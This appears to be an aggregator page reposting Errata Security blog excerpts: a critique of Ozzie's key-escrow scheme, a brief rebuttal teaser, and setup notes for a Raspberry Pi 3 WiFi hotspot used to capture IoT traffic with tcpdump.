We have a mathematically pure encryption algorithm called the "One Time Pad". It can't ever be broken, provably so with mathematics. It's also perfectly useless, as it's not something humans can use. That's why we use AES, which is vastly less secure (anything you encrypt today can probably be decrypted in 100 years). AES can be used by humans whereas One Time Pads cannot be. (I learned the fallacy of One Time Pads on my grandfather's knee -- he was a WW II codebreaker who broke German messages trying to futz with One Time Pads.)

The same is true with Ozzie's scheme. It focuses on the mathematical model but ignores the human element. We already know how to solve the mathematical problem in a hundred different ways. The part we don't know how to secure is the human element.

How do we know the law enforcement person is who they say they are? How do we know the "trusted Apple employee" can't be bribed?
How can the law enforcement agent communicate securely with the Apple employee? You think these things are theoretical, but they aren't. Consider financial transactions. It used to be common that you could just email your bank/broker to wire funds into an account for such things as buying a house. Hackers have subverted that, intercepting messages, changing account numbers, Guideline
ErrataRob.webp 2018-04-22 19:25:25 OMG The Stupid It Burns (lien direct) This article, pointed out by @TheGrugq, is stupid enough that it's worth rebutting.

“The views and opinions expressed are those of the author and not necessarily the positions of the U.S. Army, Department of Defense, or the U.S. Government.” Wannacry
ErrataRob.webp 2018-04-16 08:35:43 Notes on setting up Raspberry Pi 3 as WiFi hotspot (lien direct) I want to sniff the packets for IoT devices. There are a number of ways of doing this, but one straightforward mechanism is configuring a "Raspberry Pi 3 B" as a WiFi hotspot, then running tcpdump on it to record all the packets that pass through it. Google gives lots of results on how to do this, but they all assume you have the precise hardware, WiFi adapter, and software that the authors did, so that's a pain.

I got it working using the instructions here. There are a few additional notes, which is why I'm writing this blogpost, so I remember them.

https://www.raspberrypi.org/documentation/configuration/wireless/access-point.md

I'm using the RPi-3-B and not the RPi-3-B+, and the latest version of Raspbian at the time of this writing, "Raspbian Stretch Lite 2018-3-13".

Some things didn't work as described. The first is that it couldn't find the package "hostapd". The solution was to run "apt-get update" a second time.

The second problem was an error message about the NAT not working when trying to set the masquerade rule. That's because the 'upgrade' updates the kernel, making the running system out-of-date with the files on the disk. The solution to that is to make sure you reboot after upgrading.

Thus, what you do at the start is:

apt-get update
apt-get upgrade
apt-get update
shutdown -r now

Then it's just "apt-get install tcpdump" and start capturing on wlan0. This will get the non-monitor-mode Ethernet frames, which is what I want.
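For the capture step itself, something like the following does the job; the output filename is arbitrary, and -s 0 simply asks for full-length packets:

# Capture full packets on the hotspot interface into a pcap file.
sudo tcpdump -i wlan0 -s 0 -w iot.pcap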